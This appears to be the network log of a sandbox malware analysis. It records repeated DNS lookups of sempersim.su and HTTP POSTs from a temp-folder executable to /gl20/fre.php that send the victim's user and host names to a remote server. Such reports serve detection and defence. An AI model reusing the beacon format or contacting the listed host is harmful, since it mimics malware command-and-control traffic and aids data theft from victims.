Nov 24, 2022 19:54:38.032367945 CET	53	59082	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:40.838614941 CET	59504	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:40.860896111 CET	53	59504	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:42.928675890 CET	65198	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:42.948046923 CET	53	65198	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:44.985894918 CET	62910	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:45.005995035 CET	53	62910	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:46.995918989 CET	63863	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:47.343003035 CET	53	63863	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:48.619009018 CET	63229	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:48.638283968 CET	53	63229	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:50.721247911 CET	54903	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:50.739190102 CET	53	54903	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:52.685795069 CET	51530	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:52.959728956 CET	53	51530	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:54.866803885 CET	56122	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:54.884646893 CET	53	56122	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:56.722023010 CET	52556	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:56.741736889 CET	53	52556	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:59.613441944 CET	61609	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:59.633409977 CET	53	61609	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:01.607306957 CET	52481	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:01.624758959 CET	53	52481	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:03.645658016 CET	53943	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:03.665380001 CET	53	53943	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:05.605110884 CET	56086	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:05.624840975 CET	53	56086	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:07.655761003 CET	56547	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:07.675786018 CET	53	56547	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:09.708350897 CET	59881	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:09.725904942 CET	53	59881	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:11.700175047 CET	58917	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:11.717746019 CET	53	58917	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:13.761219025 CET	50343	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:13.780757904 CET	53	50343	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:15.969758987 CET	62520	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:15.987411976 CET	53	62520	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:19.049102068 CET	55629	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:19.068536043 CET	53	55629	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:21.075804949 CET	52079	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:21.095380068 CET	53	52079	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:23.105212927 CET	56569	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:23.122698069 CET	53	56569	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:25.100624084 CET	61833	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:25.119568110 CET	53	61833	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:27.077653885 CET	65044	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:27.096754074 CET	53	65044	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:29.068969011 CET	60032	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:29.090148926 CET	53	60032	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:31.114753008 CET	49232	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:31.132338047 CET	53	49232	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:33.111650944 CET	56123	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:33.130673885 CET	53	56123	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:35.135406017 CET	59752	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:35.155647993 CET	53	59752	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:37.629168987 CET	52865	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:37.651962996 CET	53	52865	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:39.901357889 CET	57322	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:39.918622017 CET	53	57322	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:40.875534058 CET	62958	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:40.892956972 CET	53	62958	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:42.774058104 CET	64404	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:42.793642044 CET	53	64404	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:44.925533056 CET	62848	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:44.944977045 CET	53	62848	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:46.990731001 CET	55956	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:47.007882118 CET	53	55956	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:48.986224890 CET	57515	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:49.005459070 CET	53	57515	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:51.025348902 CET	51321	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:51.042560101 CET	53	51321	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:53.045222044 CET	61089	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:53.064853907 CET	53	61089	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:55.046216011 CET	62766	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:55.065582991 CET	53	62766	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:57.225225925 CET	60130	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:57.242645979 CET	53	60130	8.8.8.8	192.168.2.6
Nov 24, 2022 19:55:59.286288023 CET	62732	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:55:59.304116011 CET	53	62732	8.8.8.8	192.168.2.6
Nov 24, 2022 19:56:01.353337049 CET	60690	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:56:01.372248888 CET	53	60690	8.8.8.8	192.168.2.6
Nov 24, 2022 19:56:03.361289024 CET	56750	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:56:03.381324053 CET	53	56750	8.8.8.8	192.168.2.6
Nov 24, 2022 19:56:04.733170033 CET	59336	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:56:04.750690937 CET	53	59336	8.8.8.8	192.168.2.6
Nov 24, 2022 19:56:06.802186966 CET	52715	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:56:06.820142984 CET	53	52715	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2022 19:54:11.254499912 CET	192.168.2.6	8.8.8.8	0x9d33	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:13.553924084 CET	192.168.2.6	8.8.8.8	0xec24	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:15.835585117 CET	192.168.2.6	8.8.8.8	0x6c3f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:18.123294115 CET	192.168.2.6	8.8.8.8	0x9e45	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:21.991089106 CET	192.168.2.6	8.8.8.8	0x913b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:24.912578106 CET	192.168.2.6	8.8.8.8	0xf13b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:27.135931969 CET	192.168.2.6	8.8.8.8	0x3278	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:28.961972952 CET	192.168.2.6	8.8.8.8	0x88c4	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:31.195563078 CET	192.168.2.6	8.8.8.8	0x811e	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:33.429765940 CET	192.168.2.6	8.8.8.8	0x5dea	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:35.800638914 CET	192.168.2.6	8.8.8.8	0x3818	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:38.013432026 CET	192.168.2.6	8.8.8.8	0xbc15	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:40.838614941 CET	192.168.2.6	8.8.8.8	0xdfe4	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:42.928675890 CET	192.168.2.6	8.8.8.8	0x467c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:44.985894918 CET	192.168.2.6	8.8.8.8	0x8e71	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:46.995918989 CET	192.168.2.6	8.8.8.8	0xdce6	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:48.619009018 CET	192.168.2.6	8.8.8.8	0x64a9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:50.721247911 CET	192.168.2.6	8.8.8.8	0x44bb	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:52.685795069 CET	192.168.2.6	8.8.8.8	0x15bd	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:54.866803885 CET	192.168.2.6	8.8.8.8	0xaf57	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:56.722023010 CET	192.168.2.6	8.8.8.8	0x428c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:59.613441944 CET	192.168.2.6	8.8.8.8	0x5781	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:01.607306957 CET	192.168.2.6	8.8.8.8	0x5577	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:03.645658016 CET	192.168.2.6	8.8.8.8	0xe821	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:05.605110884 CET	192.168.2.6	8.8.8.8	0x78c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:07.655761003 CET	192.168.2.6	8.8.8.8	0x88bf	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:09.708350897 CET	192.168.2.6	8.8.8.8	0x41dd	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:11.700175047 CET	192.168.2.6	8.8.8.8	0x6184	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:13.761219025 CET	192.168.2.6	8.8.8.8	0x6a56	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:15.969758987 CET	192.168.2.6	8.8.8.8	0x5414	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:19.049102068 CET	192.168.2.6	8.8.8.8	0x7518	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:21.075804949 CET	192.168.2.6	8.8.8.8	0x4df8	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:23.105212927 CET	192.168.2.6	8.8.8.8	0xcd7f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:25.100624084 CET	192.168.2.6	8.8.8.8	0x1c89	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:27.077653885 CET	192.168.2.6	8.8.8.8	0xc1ed	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:29.068969011 CET	192.168.2.6	8.8.8.8	0x72e9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:31.114753008 CET	192.168.2.6	8.8.8.8	0x3b2b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:33.111650944 CET	192.168.2.6	8.8.8.8	0xaf95	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:35.135406017 CET	192.168.2.6	8.8.8.8	0x83f0	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:37.629168987 CET	192.168.2.6	8.8.8.8	0x7648	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:39.901357889 CET	192.168.2.6	8.8.8.8	0x44d4	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:40.875534058 CET	192.168.2.6	8.8.8.8	0x10a4	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:42.774058104 CET	192.168.2.6	8.8.8.8	0x8c97	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:44.925533056 CET	192.168.2.6	8.8.8.8	0xd56b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:46.990731001 CET	192.168.2.6	8.8.8.8	0xa25f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:48.986224890 CET	192.168.2.6	8.8.8.8	0x70ee	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:51.025348902 CET	192.168.2.6	8.8.8.8	0x4c51	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:53.045222044 CET	192.168.2.6	8.8.8.8	0xf711	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:55.046216011 CET	192.168.2.6	8.8.8.8	0x6cf7	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:57.225225925 CET	192.168.2.6	8.8.8.8	0x84b4	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:59.286288023 CET	192.168.2.6	8.8.8.8	0xe37	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:01.353337049 CET	192.168.2.6	8.8.8.8	0x9b9f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:03.361289024 CET	192.168.2.6	8.8.8.8	0x8ac8	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:04.733170033 CET	192.168.2.6	8.8.8.8	0xb980	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:06.802186966 CET	192.168.2.6	8.8.8.8	0xdf9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 24, 2022 19:54:11.273976088 CET	8.8.8.8	192.168.2.6	0x9d33	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:13.892705917 CET	8.8.8.8	192.168.2.6	0xec24	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:15.854994059 CET	8.8.8.8	192.168.2.6	0x6c3f	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:18.140840054 CET	8.8.8.8	192.168.2.6	0x9e45	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:22.012207031 CET	8.8.8.8	192.168.2.6	0x913b	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:24.931736946 CET	8.8.8.8	192.168.2.6	0xf13b	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:27.153167009 CET	8.8.8.8	192.168.2.6	0x3278	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:28.979187965 CET	8.8.8.8	192.168.2.6	0x88c4	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:31.213350058 CET	8.8.8.8	192.168.2.6	0x811e	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:33.448172092 CET	8.8.8.8	192.168.2.6	0x5dea	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:35.820136070 CET	8.8.8.8	192.168.2.6	0x3818	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:38.032367945 CET	8.8.8.8	192.168.2.6	0xbc15	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:40.860896111 CET	8.8.8.8	192.168.2.6	0xdfe4	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:42.948046923 CET	8.8.8.8	192.168.2.6	0x467c	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:45.005995035 CET	8.8.8.8	192.168.2.6	0x8e71	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:47.343003035 CET	8.8.8.8	192.168.2.6	0xdce6	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:48.638283968 CET	8.8.8.8	192.168.2.6	0x64a9	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:50.739190102 CET	8.8.8.8	192.168.2.6	0x44bb	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:52.959728956 CET	8.8.8.8	192.168.2.6	0x15bd	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:54.884646893 CET	8.8.8.8	192.168.2.6	0xaf57	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:56.741736889 CET	8.8.8.8	192.168.2.6	0x428c	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:54:59.633409977 CET	8.8.8.8	192.168.2.6	0x5781	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:01.624758959 CET	8.8.8.8	192.168.2.6	0x5577	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:03.665380001 CET	8.8.8.8	192.168.2.6	0xe821	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:05.624840975 CET	8.8.8.8	192.168.2.6	0x78c	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:07.675786018 CET	8.8.8.8	192.168.2.6	0x88bf	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:09.725904942 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:11.717746019 CET	8.8.8.8	192.168.2.6	0x6184	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:13.780757904 CET	8.8.8.8	192.168.2.6	0x6a56	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:15.987411976 CET	8.8.8.8	192.168.2.6	0x5414	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:19.068536043 CET	8.8.8.8	192.168.2.6	0x7518	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:21.095380068 CET	8.8.8.8	192.168.2.6	0x4df8	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:23.122698069 CET	8.8.8.8	192.168.2.6	0xcd7f	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:25.119568110 CET	8.8.8.8	192.168.2.6	0x1c89	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:27.096754074 CET	8.8.8.8	192.168.2.6	0xc1ed	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:29.090148926 CET	8.8.8.8	192.168.2.6	0x72e9	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:31.132338047 CET	8.8.8.8	192.168.2.6	0x3b2b	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:33.130673885 CET	8.8.8.8	192.168.2.6	0xaf95	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:35.155647993 CET	8.8.8.8	192.168.2.6	0x83f0	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:37.651962996 CET	8.8.8.8	192.168.2.6	0x7648	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:39.918622017 CET	8.8.8.8	192.168.2.6	0x44d4	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:40.892956972 CET	8.8.8.8	192.168.2.6	0x10a4	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:42.793642044 CET	8.8.8.8	192.168.2.6	0x8c97	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:44.944977045 CET	8.8.8.8	192.168.2.6	0xd56b	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:47.007882118 CET	8.8.8.8	192.168.2.6	0xa25f	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:49.005459070 CET	8.8.8.8	192.168.2.6	0x70ee	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:51.042560101 CET	8.8.8.8	192.168.2.6	0x4c51	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:53.064853907 CET	8.8.8.8	192.168.2.6	0xf711	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:55.065582991 CET	8.8.8.8	192.168.2.6	0x6cf7	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:57.242645979 CET	8.8.8.8	192.168.2.6	0x84b4	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:55:59.304116011 CET	8.8.8.8	192.168.2.6	0xe37	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:01.372248888 CET	8.8.8.8	192.168.2.6	0x9b9f	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:03.381324053 CET	8.8.8.8	192.168.2.6	0x8ac8	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:04.750690937 CET	8.8.8.8	192.168.2.6	0xb980	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false
Nov 24, 2022 19:56:06.820142984 CET	8.8.8.8	192.168.2.6	0xdf9	No error (0)	sempersim.su	95.213.216.202	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sempersim.su

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49697	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:11.348011017 CET	8	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 196 Connection: close
Nov 24, 2022 19:54:11.404869080 CET	9	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: 'ckav.ruengineer016477DESKTOP-716T771k08F9C4E9C79A3B52B3F739430UggQa
Nov 24, 2022 19:54:13.168977976 CET	9	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:14 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 15 Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49698	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:13.981662989 CET	10	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 196 Connection: close
Nov 24, 2022 19:54:14.045902014 CET	10	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: 'ckav.ruengineer016477DESKTOP-716T771+08F9C4E9C79A3B52B3F739430lRbTK
Nov 24, 2022 19:54:15.576119900 CET	11	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:17 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 15 Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49710	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:35.914326906 CET	271	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:35.978511095 CET	271	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
